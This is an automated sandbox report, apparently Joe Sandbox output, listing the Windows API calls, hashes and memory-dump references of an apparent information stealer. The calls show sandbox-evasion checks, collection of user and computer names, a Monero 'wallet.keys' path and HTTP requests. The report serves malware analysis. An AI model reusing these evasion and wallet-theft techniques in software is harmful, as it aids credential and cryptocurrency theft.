                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 1555a0c69232f4a3d67746e72eae1bb3b734efb41de710a6f80b74f23eceb8ca
                              • Instruction ID: 0e93680fbbfb0a0b03ac8b9cb403010076a558e136f51ca0a89024c65404d8ef
                              • Opcode Fuzzy Hash: 1555a0c69232f4a3d67746e72eae1bb3b734efb41de710a6f80b74f23eceb8ca
                              • Instruction Fuzzy Hash: F14162B1E04258ABDB10DF98DC45BDEBBB8FF18704F104199F509A7280DB746A44CBA6
                              Function 008669F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C0570), ref: 008698A1
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C05A0), ref: 008698BA
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C0840), ref: 008698D2
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C0738), ref: 008698EA
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C0558), ref: 00869903
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C88E0), ref: 0086991B
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015B6980), ref: 00869933
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015B6960), ref: 0086994C
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C06A8), ref: 00869964
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C06D8), ref: 0086997C
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C06F0), ref: 00869995
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C05E8), ref: 008699AD
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015B69A0), ref: 008699C5
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C0708), ref: 008699DE
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 008511D0: ExitProcess.KERNEL32 ref: 00851211
                                • Part of subcall function 00851160: GetSystemInfo.KERNEL32(?), ref: 0085116A
                                • Part of subcall function 00851160: ExitProcess.KERNEL32 ref: 0085117E
                                • Part of subcall function 00851110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0085112B
                                • Part of subcall function 00851110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00851132
                                • Part of subcall function 00851110: ExitProcess.KERNEL32 ref: 00851143
                                • Part of subcall function 00851220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0085123E
                                • Part of subcall function 00851220: __aulldiv.LIBCMT ref: 00851258
                                • Part of subcall function 00851220: __aulldiv.LIBCMT ref: 00851266
                                • Part of subcall function 00851220: ExitProcess.KERNEL32 ref: 00851294
                                • Part of subcall function 00866770: GetUserDefaultLangID.KERNEL32 ref: 00866774
                                • Part of subcall function 00851190: ExitProcess.KERNEL32 ref: 008511C6
                                • Part of subcall function 00867850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008511B7), ref: 00867880
                                • Part of subcall function 00867850: RtlAllocateHeap.NTDLL(00000000), ref: 00867887
                                • Part of subcall function 00867850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0086789F
                                • Part of subcall function 008678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867910
                                • Part of subcall function 008678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00867917
                                • Part of subcall function 008678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0086792F
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015C8850,?,0087110C,?,00000000,?,00871110,?,00000000,00870AEF), ref: 00866ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00866AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00866AF9
                              • Sleep.KERNEL32(00001770), ref: 00866B04
                              • CloseHandle.KERNEL32(?,00000000,?,015C8850,?,0087110C,?,00000000,?,00871110,?,00000000,00870AEF), ref: 00866B1A
                              • ExitProcess.KERNEL32 ref: 00866B22
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 1d69ebc535d8a6354ff815ade37c880762741f11c2893ca695ac02407f6854df
                              • Instruction ID: b7860ab3afda11bf0c05e57264f5b19b28bb5b8dae3baef519dc03f5b32fd961
                              • Opcode Fuzzy Hash: 1d69ebc535d8a6354ff815ade37c880762741f11c2893ca695ac02407f6854df
                              • Instruction Fuzzy Hash: FF310970A40208AADB08FBF8DC56BAE7779FF14301F524529F612E6191EF706905CAA3
                              Function 00851220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1204 851220-851247 call 8689b0 GlobalMemoryStatusEx 1207 851273-85127a 1204->1207 1208 851249-851271 call 86da00 * 2 1204->1208 1209 851281-851285 1207->1209 1208->1209 1211 851287 1209->1211 1212 85129a-85129d 1209->1212 1215 851292-851294 ExitProcess 1211->1215 1216 851289-851290 1211->1216 1216->1212 1216->1215
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0085123E
                              • __aulldiv.LIBCMT ref: 00851258
                              • __aulldiv.LIBCMT ref: 00851266
                              • ExitProcess.KERNEL32 ref: 00851294
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 951802b08107ee35af24fb0220f2ae2dd09754bb8334d24c7b7126c87ad82e90
                              • Instruction ID: 101af317fbf9730107b507d02f7d3a693fcd4e1ad778f289d7890614b1972d4e
                              • Opcode Fuzzy Hash: 951802b08107ee35af24fb0220f2ae2dd09754bb8334d24c7b7126c87ad82e90
                              • Instruction Fuzzy Hash: 4901FFB0E44308BADF10DBD4CC49B9EBB79FB14706F208145EA05F6180D77455458799
                              Function 00866AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1218 866af3 1219 866b0a 1218->1219 1221 866b0c-866b22 call 866920 call 865b10 CloseHandle ExitProcess 1219->1221 1222 866aba-866ad7 call 86aad0 OpenEventA 1219->1222 1228 866af5-866b04 CloseHandle Sleep 1222->1228 1229 866ad9-866af1 call 86aad0 CreateEventA 1222->1229 1228->1219 1229->1221
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015C8850,?,0087110C,?,00000000,?,00871110,?,00000000,00870AEF), ref: 00866ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00866AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00866AF9
                              • Sleep.KERNEL32(00001770), ref: 00866B04
                              • CloseHandle.KERNEL32(?,00000000,?,015C8850,?,0087110C,?,00000000,?,00871110,?,00000000,00870AEF), ref: 00866B1A
                              • ExitProcess.KERNEL32 ref: 00866B22
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: e22c7712de6692692d2af664ac74444056ae98c04abeef9176a3831c096e4125
                              • Instruction ID: 0779833598754d9f2e4e91829199b4f2a4ff6baf2912490a84b3f17352d4630f
                              • Opcode Fuzzy Hash: e22c7712de6692692d2af664ac74444056ae98c04abeef9176a3831c096e4125
                              • Instruction Fuzzy Hash: 8FF03A30A40269EBE710EBE09C06BBD7A34FB14702F118516B902F11C1EFB05551DAA7
                              Function 008547B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00854839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00854849
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 0d23095510e27832f01529db18d55874dbd869fd820417866a01166f64e9a4ab
                              • Instruction ID: 5172276f44c14ee603e60a8255343ec87def3d03359291f0301bf86b150b5f33
                              • Opcode Fuzzy Hash: 0d23095510e27832f01529db18d55874dbd869fd820417866a01166f64e9a4ab
                              • Instruction Fuzzy Hash: 98213EB1D00209ABDF14DFA4E945ADE7B74FB44320F10862AF919A72C0EB706A05CF92
                              Function 008651F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 00856280: InternetOpenA.WININET(00870DFE,00000001,00000000,00000000,00000000), ref: 008562E1
                                • Part of subcall function 00856280: StrCmpCA.SHLWAPI(?,015CE4B0), ref: 00856303
                                • Part of subcall function 00856280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00856335
                                • Part of subcall function 00856280: HttpOpenRequestA.WININET(00000000,GET,?,015CDD78,00000000,00000000,00400100,00000000), ref: 00856385
                                • Part of subcall function 00856280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008563BF
                                • Part of subcall function 00856280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008563D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00865228
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 0182145ec9a84071f85e0c143200585af015e06aa0e64e1bb849e3a5103734f3
                              • Instruction ID: 34028fb94482ecca2e893627278873e1483fd8fcf4ec5c2c3988820ab1881904
                              • Opcode Fuzzy Hash: 0182145ec9a84071f85e0c143200585af015e06aa0e64e1bb849e3a5103734f3
                              • Instruction Fuzzy Hash: 5211DD30910548A6CB18FFA8DD96AED7378FF50301F418164F91AA7592EF34AB05CA93
                              Function 00851110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0085112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00851132
                              • ExitProcess.KERNEL32 ref: 00851143
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 8e7871202804914f9939a679e3bdcbd667a2a8490430f5f48edf91c66c06a994
                              • Instruction ID: ca0aa36893ac76229dcc4192e219856a46b19195b979369de7c4c2bc5966043a
                              • Opcode Fuzzy Hash: 8e7871202804914f9939a679e3bdcbd667a2a8490430f5f48edf91c66c06a994
                              • Instruction Fuzzy Hash: A0E0E670A95308FBEB10ABE49C0EB0976B8EB14B02F104056F709B61D0DAB5264596DA
                              Function 008510A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008510B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008510F7
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 330ff97ce26e8a959d1948c8ff88b63cd3e763ebd7a4eb6127b64ddb7d2471c6
                              • Instruction ID: 68256ee2b03baacc9db5d76773a14a23187be80007383e3b13bb2849096763af
                              • Opcode Fuzzy Hash: 330ff97ce26e8a959d1948c8ff88b63cd3e763ebd7a4eb6127b64ddb7d2471c6
                              • Instruction Fuzzy Hash: D3F0E271641208BBEB14DAA8AC4AFBAB7E8E705B15F300449F904E3280D9719E04CAA1
                              Function 00851190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867910
                                • Part of subcall function 008678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00867917
                                • Part of subcall function 008678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0086792F
                                • Part of subcall function 00867850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008511B7), ref: 00867880
                                • Part of subcall function 00867850: RtlAllocateHeap.NTDLL(00000000), ref: 00867887
                                • Part of subcall function 00867850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0086789F
                              • ExitProcess.KERNEL32 ref: 008511C6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 8bef2c8f2dc02e55fde9069c274e7237d7c7fe2d72f3072d61a3f350da59e490
                              • Instruction ID: 45332b6d21877bcbc67a4f80e236949aa1ec8c9e199a35e81657490d2a21702b
                              • Opcode Fuzzy Hash: 8bef2c8f2dc02e55fde9069c274e7237d7c7fe2d72f3072d61a3f350da59e490
                              • Instruction Fuzzy Hash: 6AE0ECA5A5420153DA00B3F8AC4AB2A369CFB2434EF050926FE09D2102FE25E80585AB

                              Non-executed Functions

                              Function 008638B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 008638CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 008638E3
                              • lstrcat.KERNEL32(?,?), ref: 00863935
                              • StrCmpCA.SHLWAPI(?,00870F70), ref: 00863947
                              • StrCmpCA.SHLWAPI(?,00870F74), ref: 0086395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00863C67
                              • FindClose.KERNEL32(000000FF), ref: 00863C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
